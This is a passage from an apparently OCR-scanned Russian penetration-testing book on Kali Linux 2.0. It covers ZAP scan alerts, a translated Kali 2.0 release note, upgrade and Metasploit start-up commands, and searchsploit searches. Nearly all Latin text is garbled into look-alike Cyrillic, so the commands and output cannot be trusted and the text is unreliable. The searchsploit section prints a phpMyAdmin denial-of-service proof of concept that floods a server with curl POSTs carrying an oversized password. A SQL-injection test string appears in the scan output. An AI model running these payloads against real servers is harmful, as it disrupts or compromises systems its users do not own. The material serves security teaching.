, ППр./А92.1ба І Э5Ле5І/ту5ЧІ-іп|ЧаЫ.ЛпаехрПр’п. 


а завершена - смотрите вкладку ‘Оповещения' с информацией об обнаруженныя проблема. 



“‘История) ч Поиск | Р* Оповещения (~ Вывод иД ИГ Паук У & Активное Сканирование | + ] 




(Чтобы увеличить изображение нажмите на него) 


После этого паук начнёт строить дерево страниц сайта, а сканер проводить различные 
тесты с найденными страницами. При появлении уязвимостей, будут появляться цифры 
рядом с флажками: красные означают крайне серьёзные уязвимости (вроде 5Щ- 
инъекций и Х55). В дереве страниц сайта уязвимые страницы также будут помечены. 
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Для просмотра всех найденных уязвимостей и замечаний по безопасности, перейдите 
во вкладку "Оповещения": 






“ История ч Поиск | рв Оповещения * 

Вывод [ Щ Паук ^ Активное Сканирование + 


© 

50Ь -инъекция 

▼ Ё Оповещения (5) 

▼ Ё Сгозз 5і1е Зсгірііпд (НеТІесТесІ) 

□ СЕТ: ЬПр:/Д92.168.1.35ЛезЦтуздІ-іпі-ІаЫ/іпсІех.рГ 

Т Ё ^ $()1.-инъекция 

ЫП-адрес: Ьйр://192.168.1.35/ 

Риск: № НідН 

СопГісІепсе: Месііит 

Параметр: пате 

Атака: 2АР' ОК Т'=Т - 

Еѵісіепсе: 

С\МЕ И: 89 

ѴѴА5С ІСІ: 19 

Описание: 

В СЕТ: Н«р://192.168.1.35ДезЦту5аІ-іпі-ІаЬ1/іпсіех.р|-| 

Т (Ё ^ Х-Ргате-ОрНопз Неасіег N01 5еІ (5) 

О СЕТ: Ыір://1 92.168.1.35/го Ьоіз.іхі 

□ СЕТ: НПр:/Л92.168.1.35/зКетар.хтІ 

□ СЕТ: Ь«р:/Д92.168.1.35ЛезЦтузяІ-іпі-ІаЫ/іпсІех.рГ 
Сі СЕТ: Н«р://192,168.1. ЗБДезІ/туздІ-іпі-ІаЬІ/іпсІех.рІ' 

□ СЕТ: Ьйр:/Д92.168.1.35ЛезѴтуздІ-іпі-ІаЫ/іпсІех.рГ 
► ЁГау/еЬ ВгоѵѵзегХ$5 Ргоіесііоп N01 ЕпаЫесІ (5) 

$01 іпіесііоп тау Ье роззіЫе. 

► Ё^Х-СопІепІ-Туре-ОрІіопз Неасіег Міззіпд (5) 

Дополнительно: 




ТНе раде гезиііз ѵѵеге зиссеззГиІІу тапіриіаіесі изіпд ІИ' 
ТИе рагатеіег ѵаіие Ьеіпд тосііРіесІ ѵѵаз ИОТ зігірресі Ггс 

ч\ ) ’ ► 


Оповещения ^2 ^1 2 №0 


Инструкция довольно короткая — дополнительные опции вы можете посмотреть 
самостоятельно, думаю, много вопросов они не вызовут. 


Глава 41. Как запустить Меіазріоіі Ргатеѵѵогк в КаМ Ыпих 2.0 

КаМ Ыпих 2.0 выпущена 

Это перевод официального пресс-релиза НіірзУ/ѵѵѵѵѵѵ. каіі. ога/геІеа5е5/каІі-Ііпих-20- 
геіеазед/ 

Наша платформа для тестирования на проникновение нового поколения 

Мы до сих пор не можем отойти от конференций ВІаск Наі: и ЭЕР СОІ\І, где мы 
представили нашу новую Каіі Ыпих Эоіо, это было нечто. Благодаря нескольким 
хорошим людям, комнаты Оор были готовы к большому количеству людей — там 
многие создавали свои собственные Каіі 2.0 150 в первый раз. Но мы ещё не перестали 
чувствовать то возбуждение. И по окончании конференций мы вернулись к самому 
важному релизу Каіі после 2013. Сегодня день, когда Каіі 2.0 официально выпущена. 

Так что нового в Каіі 2.0? Это новое ядро 4.0, теперь оно основано на ЭеЬіап .Іеззіе, 
улучшено покрытие железа и беспроводных драйверов, поддержка различных 
окружений рабочего стола (§поте, кбе, хіге, таіе, е17, Іхбе, іЗѵѵт), обновлено 
окружение рабочего стола и инструменты — и этот список можно продолжить. Но эти 
свистоперделки преимущественно побочный эффект реальных изменений, 
которые имеют место под капотом. Готовы услышать реальные новости? Наберите 
дыхание, это долгий список. 

КаМ Ыпих теперь распространяется как роллинг-релиз 

Если вы не знаете, что такое роллинг-релиз, то смотрим в Википедии (я тоже не знал). 


По материалам сайта ѴѴеЬѴѴаге.Ьіі 


250 







































Тестирование на проникновение с помощью КаМ Ыпих 2.0 


Самым большим движением, которое было сделано для поддержания Каіі 2.0 
обновлённой в глобальной, длящейся манере — это трансформация Каіі в плавающий 
релиз. Это означает, что мы будем передавать наши пакеты непрерывно из РеЫап 
Тезііпк (после того как убедимся, что пакет устанавливается) — по сути 
модернизируется базовая система Каіі, которая теперь позволяет нам воспользоваться 
преимуществами самых новых пакетов РеЫап, как только они появились. Этот шаг 
подтверждает, что наш выбор РеЬіап в качестве базовой системы действительно 
окупается — мы наслаждаемся стабильностью РеЫап, оставаясь на переднем крае. 

Постоянно обновляемые инструменты, улучшенный рабочий процесс 

Другим интересным развитием нашей инфраструктуры стала интеграция вышестоящей 
системы проверки версий, которая предупреждает нас, когда выпущены новые версии 
инструментов (обычно через тэггинг §ІІ). Этот скрипт запускается ежедневно на 
выбранном списке популярных инструментов и предупреждает нас, если новые 
инструменты требуют обновления. С помощью этой новой системы, обновления 
ключевых инструментов будут происходить чаще. С введением новой системы 
мониторинга, мы постепенно искореним опцию «инструмент обновился» из нашего 
баг-трекера . 

Новые ароматы Каіі Ыпих 2.0 

Благодаря нашему процессу Ыѵе ВиіІсІ, Каіі 2.0 теперь изначально поддерживает КЭЕ, 
СІМОМЕЗ, Х^се, МАТЕ, е17, Іхсіе и іЗѵѵт. Мы перешли на СІМОМЕ 3 в этом релизе, 
положив тем самым конец длительному периоду воздержания. Мы наконец приняли 
СІМОМЕ 3, с некоторыми кастомными изменениями оно выросло в наше любимое 
окружение рабочего стола. Мы добавили поддержку многоуровневых меню, реальную 
прозрачность терминала, а также немного полезных расширений шелла §поте. Но у 
этого есть и своя цена, минимальные требования к оперативной памяти в полной 
сессии СІМОМЕ возросли до 768 МВ. Это не проблема для современного железа, но 
может сказаться на старых машинах. По этой причине мы также выпустили 
официальный минимальный Каіі 2.0 150. «Лёгкая» версия Каіі включает несколько 
полезных инструментов с легковесным окружением рабочего стола ХТсе — отличное 
решение для ограниченных в ресурсах компьютеров. 

Образы Каіі Ыпих 2.0 АКМ и ІМеІНипІег 2.0 

Вся секция АРМ образов была обновлена на Каіі 2.0 - включая ВазрЬеггу Рі, 
СНготеЬоокз, Осігоісіб... Весь набор! В этом процессе мы добавили несколько новых 
образов, таких как последний СНготеЬоок РІір — маленький красавец на картинке 
справа. Нажмите на картинку, чтобы посмотреть поближе. Другим полезными 
изменением, которое мы реализовали в наших образах АРМ — это включение 
исходников ядра для облегчения компиляции новых драйверов. 
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Мы не забыли и о ІМеіНипІег, нашей любимой мобильной платформе для тестирования 
на проникновение, которая также обновлена и теперь включает Каіі 2.0. Вместе с этим 
мы выпустили целый вагон новых образов ІЧеШипІег для 5, б, 7, 9 и 10. Образ ОпеРІиз 
Опе ІЧеЖипІег также был обновлён до Каіі 2.0, а теперь очень ожидаем образ также и 
для СМ12 — проверьте страницу ОДепзіѵе 5есигі1:ѵ ЫеЖипІег для дополнительной 
информации. 

Обновлены образы ѴМѵѵаге и ѴігіиаІВох 

ОДепзіѵе бесигііу, компания по проведению тренингов по информационной 
безопасности и тестированию на проникновение, которая стоит за Каіі Ыпих, поставила 
новые образы ѴМѵѵаге и ѴігіиаІВох Каіі 2.0 для тех, кто хочет попробовать Каіі в 
виртуальном окружении. Они включают 32 и 64 битные варианты полного рабочего 
окружения Каіі с ОІМОМЕ 3. 



ѵтѵѵаге 


Если вы хотите сделать ваше собственное виртуальное окружение, вы можете 
проконсультироваться с нашей документацией на сайте, как установить различные 
виртуальные гостевые инструменты для более гладкого опыта. 

И;ОК. Где скачать мою Каіі 2.0? 

Если Каіі 1.0 была сфокусирована на создании крепкой инфраструктуры, то Каіі 2.0 
фокусируется на капитальный пересмотр пользовательского опыта и поддержании 
обновлёнными пакеты и инструменты в репозиториях. Наряду с этим, в Каіі Ыпих 2.0 
привносятся много интересных обновлений... Вы можете отправиться на страницу 
загрузки Каіі І_іпих 2.0, чтобы получить ваше добро. 

Скачивайте все программы, в том числе и Каіі Ыпих только с официальных сайтов! 

Всё ещё И; Всё ещё йР. Как я могу обновиться до Каіі 2.0? 

Да, вы можете обновиться с Каіі 1.x до Каіі 2.0! Чтобы это сделать вам нужно 
отредактировать ваш файл зоигсе.іізі и запустить сіІ5І-ир§гасІе как это показано ниже. 
Если вы использовали некорректные или посторонние репозитории Каіі или вручную 
устанавливали или перезаписывали пакеты Каіі помимо арі, ваше обновление до Каіі 
2.0 может потерпеть неудачу. Сюда относятся скрипты вроде ІагукаІі.зГі, РТР ручное 
клонирование §І1 в некорректные директории и т. д. Всё это будет вызывать проблемы 
с существующими файлами в файловой системе и, как результат, приведёт к срыву 
обновления. Если вы что-то делали из этого, то вам лучше переустановить вашу ОС с 
нуля. 


По материалам сайта ѴѴеЬѴѴаге.Ьіі 


252 














Тестирование на проникновение с помощью КаМ Ыпих 2.0 


В противном случае делайте так: 


1| 

саР « ЕОР > /еРс/арР/зоигсез.ІізР 

21 

сІеЬ ІіРРр://ІіРРр.каІі.ог§/каІі запа таіп поп-Ргее сопРгіЬ 

3| 

сІеЬ РіРРр://зесипРу.каІі.ог§/каІІ-5есигіРу/ запа/ирбаРез таіп сопігіЬ поп-Ргее 

4| 

ЕОР 

51 


6| 

арі-§еі ирсіаіе 

71 

арр-§еі сіІ5Р-ир§гасіе # выпейте кофе или 10. 

81 

геЬооі 


Меіазріоіі: СотплипіРу / Рго больше не поставляется в Каіі 

По запросу ВарісІ7, мы удалили пакеты Меіазріоіі СоттипіРу / Рго из Каіі Ыпих и 
теперь хостим только открытый пакет теіазріоіі-ргатеѵѵогк. Всем вам, кому требуются 
версии Соттипііу или Рго, вам нужно загрузить его с Каріс17, а затем зарегистрировать 
и ввести ваши собственные персональные данные, чтобы получить лицензию. В 
дополнение, команда Яарід7 больше не поддерживает пакет Меіазріоіі в Каіі, это 
принесло некоторые существенные изменения — мы переехали на «нативную» 
(родную) установку, и теперь вместо запуска одной связки всего требуемого 
программного обеспечения, которое нужно для запуска МеРазрІоіР в одном большом 
пакете, мы используем родные зависимости внутри Каіі для поддержания пакета 
теіазріоіі-ргатеѵѵогк. Это стало результатом более быстрой, гладкой работы и 
упрощённой интеграции с зависимостями МеРазрІоіР. Для более подробно 
информации об этом, проверьте нашу страницу документации МеРазрІоіР Ргатеѵѵогк в 
Каіі . 

Запуск Меіазріоіі Ргатеѵѵогк в Каіі Ыпих 2.0 

Из-за перечисленных выше изменений в пакете теРазрІоіІ-Ргатеѵѵогк, есть несколько 
небольших изменений в том, как запустить МеРазрІоіР в Каіі — в частности, больше нет 
службы теіазріоіі. Здесь как запустить МеРазрІоіР Ргатеѵѵогк с поддержкой базы 
данных в Каіі Ыпих 2.0: 


1| 

# Запуск Ро5Р§гезцІ ОаРаЬазе 

2 1 

/еРс/іпіі.с)/ро5Р§ге5рІ зіагР 

3| 


4| 

# Инициализируем базу данных МеРазрІоіР Ргатеѵѵогк 

5 1 

тзРсІЬ іпіР 

6| 


71 

# Запускаем тзРсопзоІе 

81 

тзРсопзоІе 
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Тестирование на проникновение с помощью Каіі Ыпих 2.0 


Ваша Каіі 2.0 фуу, только что обновился 

Каіі Ыпих 2.0 — это серьёзный шаг вперёд для нас, мы непрерывно улучшаем этот 
дистрибутив. Мы надеемся вам понравится новый вид, функции, инструменты и 
рабочий процесс. 

Несколько скриншотов Каіі 2.0: 



Приложения ▼ Места ^ 


Вторник, 21:31 


ГТ] .К еп- / ®>) С* - 


О. Найти.. 


М 

Ж 

И 


чч 

чч 


Р"! 

ІЙ 


ЕЕ 

ѳѳ 

1 З-Зегѵісеі 



ЧЧ 

чч 


чч 


ЙЧ * 


01-ІпТогтаІі... 02-ѴиІпегаЬ... 


ММ 


ѳо 


03-\Л/еЬАрр5 



ЙЧ ж кат ш X 
|№ ЧЧ 1 *Ч 

і-5пі№пд 10-РоііЕхрІ 11-Рогепііс5 



ЕМегсэр 




□ «* 


*г\ 

чч 

Об-ѴУІгеІв55 


Ѳ 0 

12-РерогТіпд 


десЛТ 




О 

О 


Популярные 
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Тестирование на проникновение с помощью Каіі Ыпих 2.0 


Приложения ж Места ж Вторник, 21:31 | 1 | еп ж ж 


О. Найти... 



іосіаі епдіпе ... 5дІтэр ІегтІпеТег 


Популярные Все 





Приложения ж Места ’ 


Вторник, 21:34 


Избранное 

аігсгаск-пд 

01 - ІпРогтаІіоп СаРЬегіпд 

И сИігр 

02 - ѴиІпегаЬіІіТу Апаіузіз 

ШШ 

03 - ѴѴеЬ Арріісаііоп Апаіузіз 

► ЁЦ со«ра«у 

04 - ОаІаЬазе АззеззтепР 

Регп ѵѵіб с гг 

05 - Раззѵѵоггі Аиаскз 

► ^ 

д дізкІБтеІ 

06 - ѴѴігеІезз Аиаскз 

► ° 

07 - Реѵегзе Епдіпеегіпд 

^ ддгх 

08 - ЕхрІоіТаТіоп Тооіз 

д кізтеі 

09 - БпіРбпд & Брообпд 

► 

Ч? тсІкЗ 

10 - Ро5І Ехріоііаііоп 

► 

11 - РОГѲП5ІС5 

► [4] трое 

12 - РероіТіпд Тооіз 

Да] т ^ егт 

13 - Бузіет Бегѵісез 

* Г' 

ріхіеѵѵрз 

Узиаі арріісаііопз 

► 

ф геаѵег 

Гаі "** е 




У 
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Тестирование на проникновение с помощью Каіі Ыпих 2.0 


Глава 42. Как запустить Меіазріоіі Ргатеѵѵогк в Каіі Ыпих 1.1 

Меіазріоіі Ехріоііаііоп Ргатеѵѵогк — это инструмент для тестирования на 
проникновение. Он содержит большую базу эксплойтов, позволяет использовать их 
прямо из Меіазріоіі:. Существует две версии Меіазріоіі;, в этом уроке я рассматриваю 
бесплатную версию. 

зеагсГізрІоіі — это инструмент для поиска эксплойтов. Содержит базу, по моим 
наблюдениям, более обширную, чем МеТазрІоіІ;. Но не содержит функции 
использования эксплойтов. 

На всякий случай, разберёмся с терминологией. Эксплойт — это готовая программа, 
которая, используя конкретную уязвимость, автоматизирует процесс проникновения 
или повышения прав или другое несанкционированное действие, которое является 
следствием уязвимости. 

Обе программы не сложны, но нужно знать, что и как там делать. Обе эти программы 
включены в Каіі Ыпих «из коробки». Поэтому, возможно, вас также заинтересуют 
статьи: 

• Как запустить Меіазріоіі: Ргатеѵѵогк в Каіі Ыпих 

• Как установить Каіі Ыпих: подробная инструкция для установки на компьютер и в 

виртуальную машину 

Я буду рассматривать работу с этими программами в Каіі Ыпих, но на самом деле, эти 
утилиты можно установить на любой Ыпих. 

зеагсИзрІоіІ 


Это программа только для поиска известных эксплойтов. Чтобы вывести справку по 
ней, наберите в командной строке: 




















Тестирование на проникновение с помощью КаМ Ыпих 2.0 


Всё просто как 5 копеек: 

Ключ -с для выполнения чувствительного к регистру поиска. 

Ключ -ѵ для подробного вывода, линии с описанием могут переполнять их колонки. 

На мой взгляд, обе опции не несут ничего интересного. Для поиска просто набираете 
зеагсНзрІоіі и ключевые слова (можно несколько), разделённые пробелом: 


1 


зеагсіізріоіі рііртуасітіп 


гоо*@каІі-тіаІ: ~ 


Файл Правка Вид Поиск Терминал Справка 


Эезс гірііоп 


РаіЬ 


рбрМуАсІтіп 2.5.7 - Ветоіе сосіе Іп^есііоп Ехр 
ріірМуАсІтіп 2.6.4-рИ - Ветоіе Оігесіогу Тгаѵ 
рЬрМуАсІтіп 3.1.0 - (С5ВР) 50І_ Іпіесііоп Ѵиіп 
ріірМуАсІтіп (/зс гіріз/зеіир .ріір) РНР Сосіе Іп] 
ртаРШ! - ріірМуАсІтіп Сосіе І^есііоп ВСЕ Зсап 
ріірМуАсІтіп 2.6.3-рТ1 Сгоэз Зііе Зсгірііпд ап 
РіірМуАсІтіп - Сііепі Зісіе Сосіе Іг^'есТіоп апсі 
РіірМуАсІтіп СопТід Рііе Сосіе Іп]есііоп 
рНрМуАсІтіпЗ (ртаЗ) Ветоіе Сосіе Ехесиііоп Ехр 
ріірМуАсІтіп 3.x Змекеу Ветоіе Сосіе Іп]есііоп 
ріірМуАсІтіп 3.3.x & 3.4.x - І_оса1 Рііе Іпсіиз 
ріірМуАсІтіп 3.5.2.2 зегѵег_зупс .рбр Васксіоог 
РНРМуАсітіп 2.x Іпіогтаііоп Оізсіозиге Ѵиіпег 
РогіаЬІе ріірМуАсІтіп Ѵі/огфгезз Ріидіп Аиіііепі 
рфМуАсІтіп 2.x Ехрогі.РНР Рііе Оізсіозиге Ѵи 
рфМуАсІтіп 2.x Ехіетаі Тгапзіогтаііопз Вето 
рфМуАсІтіп 3.5.8 апсі 4.0.0-ВС2 - Миіііріе Ѵи 
рфМуАсІтіп АиіЬепіісаіесІ Ветоіе Сосіе Ехесиіі 
рфМуАсІтіп 2.6 зе1есі_зегѵег.1іЬ.рф Миііірі 
рфМуАсІтіп 2.6 сіізр1ау_іЫ_1іпкзЛіЬ.рИр Миі 
рфМуАсІтіп 2.6 іііете_1еіі .сзз .рф Миіііріе Р 
рфМуАсІтіп 2.6 іііете_гідііі .сзз .рф Миіііріе 
ріірМуАсІтіп 2.6 - Миіііріе І_оса1 Рііе Іпсіисіе 
РНРМуАсітіп 2.x Сопѵсбагзеі Сгозз-5ііе Зсгірі 
РНРМуАсітіп 2.x Еггог.РНР Сгозз-Зііе Зсгірііп 
рфМуАсІтіп 2.x циегуГгате .рЬр Х55 
рфМуАсІтіп 2.x зегѵег_фіаЬазез .рф Х55 
РНРМуАсітіп 2.8.1 5еі_Тііете Сгозз-5ііе Зсгірі 
РНРМуАсітіп 2.7 501.РНР Сгозз-5ііе Зсгірііпд 

РфМуАсІтіп 2.x сІЬ_с геаіе. рф сІЬ Рагатеіег Х5 

РфМуАсІтіп 2.x сІЬ_орегаііопз.рф Миіііріе Ра 
РфМуАсІтіп 2.x циегуміпсІоѵі/.рЬр Миіііріе Рага 
РфМуАсІтіп 2.x зді.рф роз Рагатеіег Х55 
рфМуАсІтіп 2.x - Миіііріе Зсгірі Аггау НапсІІ 
ріірМуАсІтіп <= 2.9.1 - Миіііріе Сгозз-Зііе 5с 
рфМуАсІтіп <= 2.11.1 Зеіир.РНР Сгозз-Зііе 5с 
ріірМуАсІтіп <= 2.11.1 5егѵег_5іаіиз.РНР Сгозз 
рфМуАсІтіп <=3.2 - ' зеп/егфаіаЬазез .рф' В 
ріірМуАсІтіп <= 3.0.1 ' ртфрсіі. рф' Сгозз Зііе 
ХАМРР 3.2.1 6 ріірМуАсІтіп 4.1.6 - Миіііріе Ѵи 
ріірМуАсІтіп <=3.3.0 'сІЬ' Рагатеіег Сгозз Зіі 
ріірМуАсІтіп 4.0.x / 4.1.x / 4.2.x - ОоЗ 


/рф/іл/еЬаррз/309 .с 
/рф/меЬаррз/1244 .рі 
/рф/меЬаррз/7382 .іхі 
/рф/іл/еЬаррз/8921 .зіі 
/рф/ѵѵеЬаррз/8992 .рф 
/рф/меЬаррз/12642 .іхі 
/рф/меЬаррз/15699 .іхі 
/рф/меЬаррз/16913 . гЬ 
/рф/\л/еЬаррз/1751Ѳ .ру 
/рф/іл/еЬаррз/17514 .рф 
/рфЛ/еЬаррз/18371 . гЬ 
/рф/іл/еЬаррз/21834 . гЬ 
/рф/меЬаррз/22798 .іхі 
/рфЛ/еЬаррз/23356 .іхі 
/рф/іл/еЬаррз/23640 .іхі 
/рф/іл/еЬаррз/24817 .іхі 
/ріір/ѵѵеЬаррз/25003 .іхі 
/рф/гетоіе/25136 . гЬ 
/рф/іл/еЬаррз/25152 .іхі 
/рфЛ/еЬаррз/25153 .іхі 
/ріірЛі/еЬаррз/25154 .іхі 
/рф/меЬаррз/25155 .іхі 
/рфЛ/еЬаррз/25156 .іхі 
/рф/іл/еЬаррз/25330 .іхі 
/рф/меЬаррз/26199 .іхі 
/рф/іл/еЬаррз/26392 .іхі 
/рфЛ/еЬаррз/26393 .іхі 
/рфЛ/еЬаррз/27435 .іхі 
/рф/ѵѵеЬаррз/27632 .іхі 
/рф/іл/еЬаррз/29058 .іхі 
/рф/меЬаррз/29059 .іхі 
/рф/іл/еЬаррз/29060 .іхі 
/рфЛ/еЬаррз/29061 .іхі 
/рф/іліеЬаррз/29062 .іхі 
/рф/меЬаррз/29895 .іхі 
/рф/іл/еЬаррз/30653 .іхі 
/рф/меЬаррз/30733.іхі 
/рфЛ/еЬаррз/32383 .іхі 
/рфЛ/еЬаррз/32531 .іхі 
/рф/іл/еЬаррз/32721 .іхі 
/рф/іл/еЬаррз/33060 .іхі 
/рф/сІоз/35539 .іхі 


■ 


:~# I 


По материалам сайта ѴѴеЬѴѴаге.Ьіі 


257 

















Тестирование на проникновение с помощью Каіі Ыпих 2.0 


1 


зеагсЬзрІо И; ѵѵогфгезз 


гооі@каІі-тіаІ: ~ 


Файл Правка Вид Поиск Терминал Справка 


іл/огсІРгезз Ѵісіеох7 ІІСС РТидіп 2.5.3.2 'ІізіісІ 
іл/огсІРгезз Аисііо Ріидіп 0.5.1 1 зЬомііІе 1 Рага 
В55 ЕеесІ Веасіег МогсІРгезз Ріидіп 0.1 ' гзз_иг 
л/о гсІР гезз Ѵі/Р РеаіигесІ Розі ѵ/ііЬ ТЬитЬпаіІ Р1 
л/огсІРгезз Ѵ\/Р РиЬІісаііоп АгсЬіѵе Ріидіп 2.0. 
л/огсІРгезз РеаіигесІ Сопіепі Ріидіп 0.0.1 'Ііз 
[л/огсІРгезз Весір.іу 1.1.7 ' иріоасіітаде .рЬр' А 
л/огсіРгезз Реаіиге Зіісіезііом Ріидіп 1.0.6 \'з 
л/огсІРгезз ВегаЫСосІе Сепегаіог Ріидіп 1.0 'д 
л/огсІРгезз оОеу-СаІІегу Ріидіп 0.2 'іЬрѵ_сІота 
л/огсІРгезз РССНаі \л/іфеі Ріидіп 2.1.7 ’раііі' 
А/огсІРгезз ТадІ\Ііп]а Ріидіп 1.0 ' ісі' Рагатеіег 
іл/огфгезз 5Р Сііепі Ооситепі Мападег Ріидіп 
л/огфгезз СМ Ромпіоасі Мападег Ріидіп 2.0.0 - 
|л/огсіргезз мрОаіаТаЬІез Ріидіп 1.5.3 - 50І_ Іп 
л/огфгезз ѵфОаіаТаЬІез Ріидіп 1.5.3 - ФаиіЬ 
л/огфгезз Соодіе йоситепі ЕтЬесІсІег 2.5.14 - 
л/огсІРгезз СО Зіаг Ваііпд Ріидіп 1.9.7 'мріп' 
л/огфгезз РВ Васкир Ріидіп - АгЬіігагу Рііе 
[л/огсІРгезз ІСІТ Розіз Біісіег іл/іфеі Ріидіп 1. 
'огсІРгезз СотісРгезз Мападег Ріидіп 1.4.9 '1 
л/огсіРгезз ѴТ-Аисііо Ріидіп 1.7 1 ѵ‘ Рагатеіег 
ЗаскМРир Ріидіп 1.4 іог Іл/огсІРгезз Миіііріе I 
л/огсІРгезз <=4.0 Репіаі оі Зегѵісе Ехріоіі 
л/огфгезз <4.0.1 - йепіаі оі Зегѵісе 
Іпііпе Саііегу Ѵі/огсІРгезз Ріидіп 0.3.9 1 сіо' Р 
РЬоіоЗтазЬ Оаііегіез Іл/огсіРгезз Ріидіп 1.0.x 
1 РІазЬ Саііегу МогсІРгезз Ріидіп 0.2.5 Сгозз 
|_агуезі Саііегу \л/огсІРгезз Ріидіп 1.0.26 1 іта 
л/огфгезз ІМехіепсІ РасеЬоок Соппесі Ріидіп 1. 
Сагібб І_ііе \л/огсІРгезз Есоттегсе 1.5.1.17 - В 
СосІеАгі Соодіе МРЗ Ріауег \л/о гсір гезз Ріидіп - 
л/огсІРгезз ЗосІаііеасІ Роііз Ріидіп 2.0.2 - Миіі 
іл/огсІРгезз Ваііпд-\л/іфеі Ріидіп 1.3.1 - Миііі 
л/огсІргезз А] ах Зіоге Фсаіог 1.2 - АгЬіігагу 
л/огфгезз Ріидіп Зутрозіит 14.10 - 50І_ Іп]ес 
л/огсІргезз Оомпіоасі Мападег 2.7.4 - Яетоіе Со 
л/огсІргезз Ѵ\/р Зутрозіит 14.11 - ФаиіЬепіісаі 
Часезіег Іл/огсІРгезз Ріидіп 0.1 ’а]ах_асііоп' 
іѵе Ѵі/іге 2.3.1 Рог Іл/огфгезз Миіііріе Зесиг 
ЗреІІсЬескег Ріидіп 3.1 іо г Іл/огсІРгезз 'депег 
ТЬе Сагеііе Есііііоп 2.9.4 Рог Іл/огфгезз Миіі 
л/огсІРгезз Іл/Р-5іагзВаіеВох Ріидіп 1.1 Раг 
Зегтоп Вгомзег Іл/огсіРгезз Ріидіп 0.43 Сгозз 5 
л/Р А] ах Весепі Розіз Іл/огсІРгезз Ріидіп 1.0.1 


/рфЛѵеЬаррз/35257 .іхі 
/рф/ѵлеЬаррз/35258 .іхі 
/рф/меЬаррз/35261 .іхі 
/рЬр/меЬаррз/35262 .іхі 
/рф/меЬаррз/35263 .іхі 
/рф/меЬаррз/35264 .іхі 
/рф/меЬаррз/35265 .рИр 
/рф/ѵлеЬаррз/35285 .іхі 
/рф/меЬаррз/35286.іхі 
/рф/меЬаррз/35288 .іхі 
/рф/меЬаррз/35289 .іхі 
/рЬр/ѵ^еЬаррз/35300 .іхі 
/рф/ѴеЬаррз/35313 .іхі 
/рф/меЬаррз/35324 .іхі 
/рф/меЬаррз/35340 .іхі 
/рф/ѴеЬаррз/35341 .ру 
/рф/меЬаррз/35371 .іхі 
/рф/меЬаррз/35373 .іхі 
/рф/меЬаррз/35378 .іхі 
/рф/меЬаррз/35392 .іхі 
/рф/меЬаррз/35393 . і хі 
/рф/меЬаррз/35394 .іхі 
/рф/меЬаррз/35400 .іхі 
/рф/меЬаррз/35413 .рф 
/рф/меЬаррз/35414 .іхі 
/рф/меЬаррз/35418 .іхі 
/рф/меЬаррз/35429 . і хі 
/рЬр/меЬарр5/3543Ѳ.іхі 
/рф/меЬаррз/35435 .іхі 
/рф/ѴеЬаррз/35439 .іхі 
/рф/меЬаррз/35459 .іхі 
/рф/меЬаррз/3546Ѳ .іхі 
/рф/ѵлеЬаррз/35475 .іхі 
/рф/меЬаррз/35476 .іхі 
/рф/меЬаррз/35493 .іхі 
/рф/меЬаррз/35505 .іхі 
/рфЛѵеЬаррз/35533 .ру 
/рф/меЬаррз/35543 .іхі 
/рф/меЬаррз/35562 .іхі 
/рф/меЬаррз/35603 .іхі 
/рфЛ/еЬаррз/35607 .іхі 
/рф/меЬаррз/35608 .іхі 
/рф/меЬаррз/35634 .іхі 
/рф/ѵі/еЬаррз/35657 . ріір 
/рф/меЬаррз/35663 .іхі 


I 


іі : ~# { 


Думаю, идея понятна. Можете искать по конкретным приложениям (и их версиям), 
операционным системам, плагинам и т. д. 

Давайте посмотрим внимательно на вывод: есть файлы следующих типов: .с, .рі, .1x1, 
.зН, .рНр, .гЬ, .ру, . 2 Ір, .)гмг, .азт, .Ніт и др. 

Файлы с расширением .1x1 можно только читать — открывайте его любым блокнотом и 
читай об уязвимости. Содержимое этих файлов, обычно, следующее: описание 
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уязвимости, пример использования, источник, информация о подверженных 
уязвимости версиях и т. д. 


Файл Правка 

Инструменты Синтаксис 

Буферы Окно 

Справка 



Ш А О 

^ & 

е ш ф 

♦ $ 

а і ^ [ 

а ^ @ 

■ 


0Е5СВІРТІ0М: 


А ѵиІпегаЬіІіѣу ргезепі: іп іп рКрМуАсІтіп 4.0.x Ьеіоге 4.0.10.7, 4.1. х 
Ьеіоге 4.1.14.8, апсі 4.2.x Ье'Роге 4.2.13.1 аііоѵз гетоіе аНаскегз Іо 
саизе а сіепіаі аР зегѵісе (гезоигсе сопзитрііоп) ѵіа а Іопд раззѵ/огсі. 
СѴЕ-2014-9218 ѵаз аззідпесі 


Тіте І_іпе: 


РесетЬег 3, 2014 - А рНрМуАсІтіп ирсІаФе апсі *Ье зесигііу асіѵізогу із 
риЬІізЬесІ. 


Ргоо-р о'Р Сопсері:: 


*1 - Сгеаііе *Не рауіоасі.* 

$ есНо -п "рта_изегпате=хххххххх&рта_раззѵогс1=" > рауіоасі && ргіп'Ь'Р "%з" 
{1.. 1000000} » рауіоасі 

*2 - Рег-рогтіпд -ьЬе Оепіаі оі Зегѵісе аНаск.* 

$ -Рог і іп 'зея 1 150'; сіо (сигі --сіаіа @рауІоас! 

РгІ:1:р://уоиг-ѵ/еЬ5егѵег-іпз1:аІІа1:іоп/рЬртуас1тіп/ --зііепі: > /сіеѵ/пиіі &) сіопе 


АиіНогз: 


-- ^ѵег ІЧіеіо -- Иі:Фр://ѵлллѵ.ЬеЬіпс11:Ье-ріге\ѵаІІз.сот 
-- Апсігез Ро^аз -- Ні:1:р://ѵмѵ.с1еѵсоп501е.іп'Ро 


Ре'Регепсез: 


ж 

ІтЫр: //ѵѵлѵ. ЬеНіпсІѣНе-Рі геѵаііз. сот/2014/ 12/ѵНеп- соокіез- Іеасі- Іо- сіоз- іп- рНртуасІтіп. Иіті 
* Ьііір://\ѵѵлѵ.рНртуасІтіп.пе^/Ьоте_раде/зесигііу/РМА5А-2014- 17.рНр 


Файлы с расширением .гЬ написаны на языке КиЬу, запускать их нужно так: 
гиЬу + пробел + расположение файла. 

Пример: 
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Некоторые файлы .гЬ выдернуты из МеТазрІоіІ:. Если при обычном запуске программа 
жалуется на отсутствие чего-то, а в коде программы встречается строка: 


1 


гедиіге ’тзТ/соге' 


То самый простой способ запуска — найти этот же плагин в МеТазрІоіІ: и запустить его 
оттуда 


Файлы .с нужно компилировать. 


Файлы .рНр запускать из командной строки. При чём если КиЬу может выводить 
диалоговые окна для ввода данных, то в РНР нужно сразу задавать необходимые 
аргументы в командной строке через пробелы после имени файла (ну или прописывать 
в коде скрипта, если это предусмотрено). 


Например: 


1 


рНр /изг/зІіаге/ехрІоИсІЬ/рІа^огтз/рНр/ѵѵеЬаррз/ЗЗДІЗ.рІір ѵѵеЬѵѵаге.Ьіі АІехеу 50 


гооІ@каіі-тіаІ: ~ 

